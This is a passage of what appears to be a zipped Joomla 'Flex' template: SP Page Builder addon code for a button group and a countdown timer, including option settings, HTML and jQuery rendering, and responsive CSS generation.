									if(_.isEmpty(item)){
										return "0";
									}
									return item;
								}).join(" ")
							}
						} else {
							button_padding = _.split(button.button_padding, " ").map(item => {
								if(_.isEmpty(item)){
									return "0";
								}
								return item;
							}).join(" ")
						}

					}
					if(_.isObject(button.fontsize)){
						font_size += \'font-size:\'+ button.fontsize.md + \'px;\';
					} else {
						font_size += \'font-size:\'+ button.fontsize + \'px;\';
					}
					if(_.isObject(button.fontsize)){
						font_size_sm += \'font-size:\'+ button.fontsize.sm + \'px;\';
					} else {
						font_size_sm += \'font-size:\'+ button.fontsize + \'px;\';
					}
					if(_.isObject(button.fontsize)){
						font_size_xs += \'font-size:\'+ button.fontsize.xs + \'px;\';
					} else {
						font_size_xs += \'font-size:\'+ button.fontsize + \'px;\';
					}
				#>
				#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-{{ button.type }}{
					letter-spacing: {{ button.letterspace }};
					<# if(_.isObject(button_font_style) && button_font_style.underline) { #>
						text-decoration: underline;
						<# modern_font_style = true #>
					<# } #>

					<# if(_.isObject(button_font_style) && button_font_style.italic) { #>
						font-style: italic;
						<# modern_font_style = true #>
					<# } #>

					<# if(_.isObject(button_font_style) && button_font_style.uppercase) { #>
						text-transform: uppercase;
						<# modern_font_style = true #>
					<# } #>

					<# if(_.isObject(button_font_style) && button_font_style.weight) { #>
						font-weight: {{ button_font_style.weight }};
						<# modern_font_style = true #>
					<# } #>

					<# if(!modern_font_style) { #>
						<# if(_.isArray(button_fontstyle)) { #>
							<# if(button_fontstyle.indexOf("underline") !== -1){ #>
								text-decoration: underline;
							<# } #>
							<# if(button_fontstyle.indexOf("uppercase") !== -1){ #>
								text-transform: uppercase;
							<# } #>
							<# if(button_fontstyle.indexOf("italic") !== -1){ #>
								font-style: italic;
							<# } #>
							<# if(button_fontstyle.indexOf("lighter") !== -1){ #>
								font-weight: lighter;
							<# } else if(button_fontstyle.indexOf("normal") !== -1){#>
								font-weight: normal;
							<# } else if(button_fontstyle.indexOf("bold") !== -1){#>
								font-weight: bold;
							<# } else if(button_fontstyle.indexOf("bolder") !== -1){#>
								font-weight: bolder;
							<# } #>
						<# } #>
					<# } #>
				}

				<# if(button.type == "custom"){ #>
					#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-custom{
						color: {{ button.color }};
						padding: {{ button_padding }};
						{{font_size}}
						<# if(button.appearance == "outline"){ #>
							border-color: {{ button.background_color }};
							background-color: transparent;
						<# } else if(button.appearance == "3d"){ #>
							border-bottom-color: {{ button.background_color_hover }};
							background-color: {{ button.background_color }};
						<# } else if(button.appearance == "gradient" && _.isObject(button.background_gradient)){ #>
							border: none;
							<# if(typeof button.background_gradient.type !== "undefined" && button.background_gradient.type == "radial"){ #>
								background-image: radial-gradient(at {{ button.background_gradient.radialPos || "center center"}}, {{ button.background_gradient.color }} {{ button.background_gradient.pos || 0 }}%, {{ button.background_gradient.color2 }} {{ button.background_gradient.pos2 || 100 }}%);
							<# } else { #>
								background-image: linear-gradient({{ button.background_gradient.deg || 0}}deg, {{ button.background_gradient.color }} {{ button.background_gradient.pos || 0 }}%, {{ button.background_gradient.color2 }} {{ button.background_gradient.pos2 || 100 }}%);
							<# } #>
						<# } else { #>
							background-color: {{ button.background_color }};
						<# } #>
					}

					#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-custom:hover{
						color: {{ button.color_hover }};
						background-color: {{ button.background_color_hover }};
						<# if(button.appearance == "outline"){ #>
							border-color: {{ button.background_color_hover }};
						<# } else if(button.appearance == "gradient" && _.isObject(button.background_gradient_hover)){ #>
							<# if(typeof button.background_gradient_hover.type !== "undefined" && button.background_gradient_hover.type == "radial"){ #>
								background-image: radial-gradient(at {{ button.background_gradient_hover.radialPos || "center center"}}, {{ button.background_gradient_hover.color }} {{ button.background_gradient_hover.pos || 0 }}%, {{ button.background_gradient_hover.color2 }} {{ button.background_gradient_hover.pos2 || 100 }}%);
							<# } else { #>
								background-image: linear-gradient({{ button.background_gradient_hover.deg || 0}}deg, {{ button.background_gradient_hover.color }} {{ button.background_gradient_hover.pos || 0 }}%, {{ button.background_gradient_hover.color2 }} {{ button.background_gradient_hover.pos2 || 100 }}%);
							<# } #>
						<# } #>
					}
					@media (min-width: 768px) and (max-width: 991px) {
						#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-custom{
							padding: {{ button_padding_sm }};
							{{font_size_sm}}
						}
					}
					@media (max-width: 767px) {
						#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-custom{
							padding: {{ button_padding_xs }};
							{{font_size_xs}}
						}
					}
				<# } #>
				<# if(button.type == "link"){ #>
					#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-link{
						color: {{button.link_button_color}};
						border-color: {{button.link_border_color}};
						border-width: 0 0 {{button.link_button_border_width}}px 0;
						padding: 0 0 {{button.link_button_padding_bottom}}px 0;
						text-decoration: none;
						border-radius: 0;
					}
					<# if(button.link_button_status == "hover") { #>
						#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-link:hover,
						#sppb-addon-{{ addonId }} #btn-{{ addonId }}{{ key }}.sppb-btn-link:focus{
							color: {{button.link_button_hover_color}};
							border-color: {{button.link_button_border_hover_color}};
						}
					<# } #>
				<# } #>
			<# }); #>

			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ addonId }} .sppb-addon-content {
					<# if(_.isObject(data.margin)){ #>
						margin: -{{ data.margin.sm }}px;
					<# } #>
				}
				#sppb-addon-{{ addonId }} .sppb-addon-content .sppb-btn {
					<# if(_.isObject(data.margin)){ #>
						margin: {{ data.margin.sm }}px;
					<# } #>
				}
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ addonId }} .sppb-addon-content {
					<# if(_.isObject(data.margin)){ #>
						margin: -{{ data.margin.xs }}px;
					<# } #>
				}
				#sppb-addon-{{ addonId }} .sppb-addon-content .sppb-btn {
					<# if(_.isObject(data.margin)){ #>
						margin: {{ data.margin.xs }}px;
					<# } #>
				}
			}
		</style>
		<div class="sppb-addon sppb-addon-button-group {{ data.alignment }} {{ data.class }}">
			<div class="sppb-addon-content">
				<# _.each(data.sp_button_group_item, function(button, key){ #>
					<#
					var classList = button.class;
					classList += " sppb-btn-"+button.type;
					classList += " sppb-btn-"+button.size;
					classList += " sppb-btn-"+button.shape;
					if(!_.isEmpty(button.appearance)){
						classList += " sppb-btn-"+button.appearance;
					}
					classList += " "+button.block;
					#>
					<a href=\'{{ button.url }}\' id="btn-{{ addonId }}{{ key }}" target="{{ button.target }}" class="sppb-btn {{ classList }}"><# if(button.icon_position == "left" || !_.isEmpty(button.peicon_name)) { #><i class="pe {{ button.peicon_name }}"></i><# } else if(button.icon_position == "left" || !_.isEmpty(button.icon)) { #><i class="fa {{ button.icon }}"></i><# } #>{{ button.title }}<# if(button.icon_position == "right" && !_.isEmpty(button.icon)) { #><i style="margin-left:5px;margin-right:-1px;" class="fa {{ button.icon }}"></i><# } #><# if(button.icon_position == "right" && !_.isEmpty(button.peicon_name)) { #><i style="margin-left:5px;margin-right:-1px;" class="pe {{ button.peicon_name }}"></i><# } #></a>
				<# }); #>
			</div>
		</div>
		<# if(!data.sp_button_group_item.length){ #>
			<div class="sppb-empty-addon">
				<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" width="140.1px" height="24.2px" viewBox="0 0 140.1 24.2" >
				<path class="st0" d="M19,13.5c-0.4-0.4-0.8-0.4-1.1,0.1c-0.9,1.1-1.9,2.1-2.9,3c-3.5,3-7.6,4.7-12.1,5.5
						c-0.6,0.1-0.8-0.1-0.8-0.7c0-0.9,0-1.9,0-2.8l0,0l0,0l0,0V5.5V4.9c0-0.2,0-0.4,0.3-0.5c0.4-0.3,0.7,0.2,1.1,0.5
						c3.4,2.4,6.8,4.9,10.2,7.3c0.5,0.3,0.5,0.5,0.1,0.9c-2.6,2.4-5.5,4.1-8.9,5.1c-1.2,0.3-1.2,0.3-1.2,1.6c0,0.5,0.1,0.6,0.6,0.5
						c1-0.2,2-0.5,2.9-0.8c3.7-1.4,6.8-3.5,9.4-6.5c0.6-0.7,0.6-0.6-0.1-1.2C11.1,7.9,5.9,4.2,0.7,0.5C0.6,0.4,0.4,0.3,0.3,0.4
						c-0.2,0-0.1,0.2-0.1,0.4c0,0.9,0,1.8,0,2.7c0,0.3,0,0.4,0,0.6v3.2l0,0v2.6v1.2V13v1.4v1.5l0,0l-0.1,4.3l0,0c0,0.3,0,0.5,0,0.7
						c0,0.8,0,1.7,0,2.5c0,0.4,0.1,0.6,0.6,0.6c2.1-0.1,4.1-0.4,6.1-1c5-1.5,9.1-4.2,12.5-8.1C19.9,14.2,19.9,14.2,19,13.5z"/>
				<path class="st1" d="M9.1,12.3c0.1-0.1,0.1-0.2,0-0.3c-1.2-0.9-2.4-1.7-3.5-2.5C5.4,9.4,5.3,9.2,5.2,9.3
						c-0.1,0-0.1,0.1-0.1,0.2v0.2v4.5C6.8,14.1,8.2,13.1,9.1,12.3z"/>
				</svg>
			</div>
		<# } #>
		';

        return $output;
    }
}
PK!�{C�S!S!-flex/sppagebuilder/addons/countdown/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted aceess');

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_countdown',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
				),

				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h3',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_font_family'=>array(
					'type'=>'fonts',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
					'depends'=>array(array('title', '!=', '')),
					'selector'=> array(
						'type'=>'font',
						'font'=>'{{ VALUE }}',
						'css'=>'.sppb-addon-title { font-family: {{ VALUE }}; }'
					)
				),

				'title_fontsize'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'max'=>500,
					'responsive'=>true,
					'depends'=>array(array('title', '!=', '')),
				),

				'title_lineheight'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
					'std'=>'',
					'max'=>500,
					'responsive'=>true,
					'depends'=>array(array('title', '!=', '')),
				),

				'title_font_style'=>array(
					'type'=>'fontstyle',
					'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_letterspace'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
					'values'=>array(
						'0'=> 'Default',
						'1px'=> '1px',
						'2px'=> '2px',
						'3px'=> '3px',
						'4px'=> '4px',
						'5px'=> '5px',
						'6px'=>	'6px',
						'7px'=>	'7px',
						'8px'=>	'8px',
						'9px'=>	'9px',
						'10px'=> '10px'
					),
					'std'=>'0',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontweight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'max'=>500,
					'responsive'=>true,
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_bottom'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'max'=>500,
					'responsive'=>true,
					'depends'=>array(array('title', '!=', '')),
				),

				'separator1'=>array(
					'type'=>'separator',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_OPTIONS'),
				),

				'date'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_DATE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_DATE_DESC'),
					'placeholder'=>'2018/05/25',
					'std'=> '2018/05/25'
				),

				'time'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_TIME'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_TIME_DESC'),
					'placeholder'=>'20:23',
					'std'=> '20:23',
				),

				'finish_text'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_FINISHED_TEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_FINISHED_TEXT_DESC'),
					'placeholder'=>'Finally we are here',
					'std'=> 'Finally we are here',
				),
				
				'finish_text_fontsize'=>array(
					'type'=>'number',
					'title'=>JText::_('FLEX_COUTNDOWN_FINISHED_TEXT_FONT_SIZE'),
					'desc'=>JText::_('FLEX_COUTNDOWN_FINISHED_TEXT_FONT_SIZE_DESC'),
					'placeholder'=>'18px',
					'std'=>'18',
					'depends'=>array(array('finish_text', '!=', '')),
				),


				'counter_height'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_HEIGHT'),
					'placeholder'=>'',
					'max'=>500,
					'responsive'=>true,
					'std'=> array('md'=>80)
				),

				'counter_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_WIDTH'),
					'placeholder'=>'',
					'max'=>500,
					'responsive'=>true,
					'std'=> array('md'=>80)
				),

				'counter_font_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_FONT_SIZE'),
					'std'=> array('md'=>36),
					'max'=>500,
					'responsive'=>true
				),

				'counter_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_TEXT_COLOR'),
					'std'=>'#FFFFFF',
				),

				'counter_background_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_BACKGROUND_COLOR'),
					'std'=>'#F14833',
				),

				'counter_user_border'=>array(
					'type'=>'checkbox',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_USE_BORDER'),
					'std'=>0
				),

				'counter_border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_WIDTH'),
					'std'=>array('md'=>1),
					'depends'=>array('counter_user_border'=>1),
					'max'=>500,
					'responsive'=>true
				),

				'counter_border_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR'),
					'std'=>'#E5E5E5',
					'depends'=>array('counter_user_border'=>1)
				),

				'counter_border_style'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE'),
					'values'=>array(
						'none'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_NONE'),
						'solid'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_SOLID'),
						'double'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_DOUBLE'),
						'dotted'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_DOTTED'),
						'dashed'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_DASHED'),
					),
					'std'=>'solid',
					'depends'=>array('counter_user_border'=>1)
				),

				'counter_border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_RADIUS'),
					'std'=>array('md'=>4),
					'max'=>500,
					'responsive'=>true
				),

				'label_font_size'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_LABEL_FONT_SIZE'),
					'std'=>array('md'=>14),
					'max'=>500,
					'responsive'=>true
				),

				'label_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_COUTNDOWN_COUNTER_LABEL_COLOR'),
					'std'=>'',
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=> ''
				),
			),
		),
	)
);
PK!�×>�>,flex/sppagebuilder/addons/countdown/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined ('_JEXEC') or die ('restricted aceess');

class SppagebuilderAddonCountdown extends SppagebuilderAddons{

	public function render() {

		// Options
		$class = (isset($this->addon->settings->class) && $this->addon->settings->class) ? ' ' . $this->addon->settings->class : '';
		$title = (isset($this->addon->settings->title) && $this->addon->settings->title) ? $this->addon->settings->title : '';
		$heading_selector = (isset($this->addon->settings->heading_selector) && $this->addon->settings->heading_selector) ? $this->addon->settings->heading_selector : 'h3';

		$output  = '';
		$output .= '<div class="sppb-addon sppb-addon-countdown ' . $class . '">';
		$output .= '<div class="countdown-text-wrap">';
		$output .= ($title) ? '<'.$heading_selector.' class="sppb-addon-title">' . $title . '</'.$heading_selector.'>' : '';
		$output .= '</div>';
		$output .= "<div class=\"sppb-countdown-timer sppb-row\"></div>";
		$output .= '</div>';
		
		return $output;
	}

	public function scripts() {
		return array(JURI::base(true) . '/components/com_sppagebuilder/assets/js/jquery.countdown.min.js');
	}

	public function js() {
		$date 		  			= JHtml::_('date', $this->addon->settings->date, 'Y/m/d');
		$time 		  			= $this->addon->settings->time;
		$finish_text 			= addslashes($this->addon->settings->finish_text);

		$js ="jQuery(function($){
			var addon_id = '#sppb-addon-'+'".$this->addon->id."';
			//console.log(addon_id +' .sppb-addon-countdown .sppb-countdown-timer');
			$( addon_id +' .sppb-addon-countdown .sppb-countdown-timer').each(function () {
					var cdDateFormate = '".$date."' + ' ' + '".$time."';
					//console.log(cdDateFormate);
					$(this).countdown(cdDateFormate, function (event) {
							$(this).html(event.strftime('<div class=\"sppb-countdown-days sppb-col-xs-6 sppb-col-sm-3 sppb-text-center\"><span class=\"sppb-countdown-number\">%-D</span><span class=\"sppb-countdown-text\">%!D: ' + '".JTEXT::_('COM_SPPAGEBUILDER_DAY')."' + ',' + '".JTEXT::_('COM_SPPAGEBUILDER_DAYS')."' + ';</span></div><div class=\"sppb-countdown-hours sppb-col-xs-6 sppb-col-sm-3 sppb-text-center\"><span class=\"sppb-countdown-number\">%H</span><span class=\"sppb-countdown-text\">%!H: ' + '".JTEXT::_('COM_SPPAGEBUILDER_HOUR')."' + ',' + '".JTEXT::_('COM_SPPAGEBUILDER_HOURS')."' + ';</span></div><div class=\"sppb-countdown-minutes sppb-col-xs-6 sppb-col-sm-3 sppb-text-center\"><span class=\"sppb-countdown-number\">%M</span><span class=\"sppb-countdown-text\">%!M:' + '".JTEXT::_('COM_SPPAGEBUILDER_MINUTE')."' + ',' + '".JTEXT::_('COM_SPPAGEBUILDER_MINUTES')."' + ';</span></div><div class=\"sppb-countdown-seconds sppb-col-xs-6 sppb-col-sm-3 sppb-text-center\"><span class=\"sppb-countdown-number\">%S</span><span class=\"sppb-countdown-text\">%!S:' + '".JTEXT::_('COM_SPPAGEBUILDER_SECOND')."' + ',' + '".JTEXT::_('COM_SPPAGEBUILDER_SECONDS')."' + ';</span></div>')).on('finish.countdown', function () {
									$(this).html('<div class=\"sppb-finish_text sppb-col-xs-12 sppb-col-sm-12 sppb-text-center\">' + '".$finish_text."' + '</div>');
							});
					});
			});
		})";
		return $js;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;

		// Counter
		$counter_style = '';
		$counter_style_sm = '';
		$counter_style_xs = '';

		$counter_style   .= (isset($this->addon->settings->counter_height) && $this->addon->settings->counter_height) ? "height: " . (int) $this->addon->settings->counter_height  . "px; line-height: " . (int) $this->addon->settings->counter_height  . "px;" : '';
		$counter_style_sm   .= (isset($this->addon->settings->counter_height_sm) && $this->addon->settings->counter_height_sm) ? "height: " . (int) $this->addon->settings->counter_height_sm  . "px; line-height: " . (int) $this->addon->settings->counter_height_sm  . "px;" : '';
		$counter_style_xs   .= (isset($this->addon->settings->counter_height_xs) && $this->addon->settings->counter_height_xs) ? "height: " . (int) $this->addon->settings->counter_height_xs  . "px; line-height: " . (int) $this->addon->settings->counter_height_xs  . "px;" : '';

		$counter_style  .= (isset($this->addon->settings->counter_width) && $this->addon->settings->counter_width) ? "width: " . (int) $this->addon->settings->counter_width  . "px;" : '';
		$counter_style_sm  .= (isset($this->addon->settings->counter_width_sm) && $this->addon->settings->counter_width_sm) ? "width: " . (int) $this->addon->settings->counter_width_sm  . "px;" : '';
		$counter_style_xs  .= (isset($this->addon->settings->counter_width_xs) && $this->addon->settings->counter_width_xs) ? "width: " . (int) $this->addon->settings->counter_width_xs  . "px;" : '';
		
		$counter_style  .= (isset($this->addon->settings->counter_font_size) && $this->addon->settings->counter_font_size) ? "font-size: " . (int) $this->addon->settings->counter_font_size  . "px;" : '';
		$counter_style_sm  .= (isset($this->addon->settings->counter_font_size_sm) && $this->addon->settings->counter_font_size_sm) ? "font-size: " . (int) $this->addon->settings->counter_font_size_sm  . "px;" : '';
		$counter_style_xs  .= (isset($this->addon->settings->counter_font_size_xs) && $this->addon->settings->counter_font_size_xs) ? "font-size: " . (int) $this->addon->settings->counter_font_size_xs . "px;" : '';
		
		$counter_style  .= (isset($this->addon->settings->counter_text_color) && $this->addon->settings->counter_text_color) ? "color: " . $this->addon->settings->counter_text_color  . ";" : '';
		$counter_style  .= (isset($this->addon->settings->counter_background_color) && $this->addon->settings->counter_background_color) ? "background-color: " . $this->addon->settings->counter_background_color  . ";" : '';

		$counter_style  .= (isset($this->addon->settings->counter_border_radius) && $this->addon->settings->counter_border_radius) ? "border-radius: " . $this->addon->settings->counter_border_radius . "px;" : '';
		$counter_style_sm  .= (isset($this->addon->settings->counter_border_radius_sm) && $this->addon->settings->counter_border_radius_sm) ? "border-radius: " . $this->addon->settings->counter_border_radius_sm . "px;" : '';
		$counter_style_xs  .= (isset($this->addon->settings->counter_border_radius_xs) && $this->addon->settings->counter_border_radius_xs) ? "border-radius: " . $this->addon->settings->counter_border_radius_xs . "px;" : '';

		$use_border = (isset($this->addon->settings->counter_user_border) && $this->addon->settings->counter_user_border) ? 1 : 0;
		if($use_border) {
			$counter_style  .= (isset($this->addon->settings->counter_border_width) && $this->addon->settings->counter_border_width) ? "border-width: " . $this->addon->settings->counter_border_width . "px;" : '';
			$counter_style  .= (isset($this->addon->settings->counter_border_style) && $this->addon->settings->counter_border_style) ? "border-style: " . $this->addon->settings->counter_border_style  . ";" : '';
			$counter_style  .= (isset($this->addon->settings->counter_border_color) && $this->addon->settings->counter_border_color) ? "border-color: " . $this->addon->settings->counter_border_color  . ";" : '';
			$counter_style_sm  .= (isset($this->addon->settings->counter_border_width_sm) && $this->addon->settings->counter_border_width_sm) ? "border-width: " . $this->addon->settings->counter_border_width_sm  . "px;" : '';
			$counter_style_xs .= (isset($this->addon->settings->counter_border_width_xs) && $this->addon->settings->counter_border_width_xs) ? "border-width: " . $this->addon->settings->counter_border_width_xs . "px;" : '';
		}

		// Label
		$label_style = '';
		$label_style_sm = '';
		$label_style_xs = '';
		$label_style .= (isset($this->addon->settings->label_font_size) && $this->addon->settings->label_font_size) ? "font-size: " . (int) $this->addon->settings->label_font_size  . "px;" : '';
		$label_style .= (isset($this->addon->settings->label_color) && $this->addon->settings->label_color) ? "color: " . $this->addon->settings->label_color  . ";" : '';
		$label_style .= (isset($this->addon->settings->counter_width) && $this->addon->settings->counter_width) ? "width: " . (int) $this->addon->settings->counter_width . "px;" : '';
		$label_style_sm .= (isset($this->addon->settings->label_font_size_sm) && $this->addon->settings->label_font_size_sm) ? "font-size: " . (int) $this->addon->settings->label_font_size_sm  . "px;" : '';
		$label_style_xs .= (isset($this->addon->settings->label_font_size_xs) && $this->addon->settings->label_font_size_xs) ? "font-size: " . (int) $this->addon->settings->label_font_size_xs  . "px;" : '';
		
		
		// Finished text
		$finish_text_style  = (isset($this->addon->settings->finish_text_fontsize) && $this->addon->settings->finish_text_fontsize) ? "font-size: " . (int) $this->addon->settings->finish_text_fontsize  . "px;line-height:1.3;" : '';
		$use_finish_text_border = (isset($this->addon->settings->counter_user_border) && $this->addon->settings->counter_user_border) ? 1 : 0;
		if($use_finish_text_border) {
			$finish_text_style .= (isset($this->addon->settings->finish_text_fontsize) && $this->addon->settings->finish_text_fontsize) ? "padding: " . (int) $this->addon->settings->finish_text_fontsize / 1.5  . "px " . (int) $this->addon->settings->finish_text_fontsize / 2  . "px " . (int) $this->addon->settings->finish_text_fontsize / 1.2  . "px;" : '';
			$finish_text_style .= (isset($this->addon->settings->counter_border_width) && $this->addon->settings->counter_border_width) ? "border-width: " . $this->addon->settings->counter_border_width  . "px;" : '';
			$finish_text_style .= (isset($this->addon->settings->counter_border_style) && $this->addon->settings->counter_border_style) ? "border-style: " . $this->addon->settings->counter_border_style  . ";" : '';
			$finish_text_style .= (isset($this->addon->settings->counter_border_color) && $this->addon->settings->counter_border_color) ? "border-color: " . $this->addon->settings->counter_border_color  . ";" : '';
			$finish_text_style .= (isset($this->addon->settings->counter_border_radius) && $this->addon->settings->counter_border_radius) ? "border-radius: " . $this->addon->settings->counter_border_radius  . "px;" : '';
		}

		$css = '';
		if($counter_style) {
			$css .= $addon_id . ' .sppb-countdown-number, '. $addon_id .' .sppb-countdown-finishedtext {';
			$css .= $counter_style;
			$css .= '}';
		}

		if($label_style) {
			$css .= $addon_id . ' .sppb-countdown-text {';
			$css .= $label_style;
			$css .= '}';
		}
		
		if($finish_text_style) {
			$css .= $addon_id . ' .sppb-finish_text {';
			$css .= $finish_text_style;
			$css .= '}';
		}

		if(!empty($counter_style_sm) || !empty($label_style_sm)){
			$css .= '@media (min-width: 768px) and (max-width: 991px) {';
				if($counter_style_sm) {
					$css .= $addon_id . ' .sppb-countdown-number, '. $addon_id .' .sppb-countdown-finishedtext {';
					$css .= $counter_style_sm;
					$css .= '}';
				}
		
				if($label_style_sm) {
					$css .= $addon_id . ' .sppb-countdown-text {';
					$css .= $label_style_sm;
					$css .= '}';
				}
			$css .= '}';
		}

		if(!empty($counter_style_xs) || !empty($label_style_xs)){
			$css .= '@media (max-width: 767px) {';
				if($counter_style_xs) {
					$css .= $addon_id . ' .sppb-countdown-number, '. $addon_id .' .sppb-countdown-finishedtext {';
					$css .= $counter_style_xs;
					$css .= '}';
				}
		
				if($label_style_xs) {
					$css .= $addon_id . ' .sppb-countdown-text {';
					$css .= $label_style_xs;
					$css .= '}';
				}
			$css .= '}';
		}

		return $css;
	}

	public static function getTemplate(){
		$output = '
		<style type="text/css">
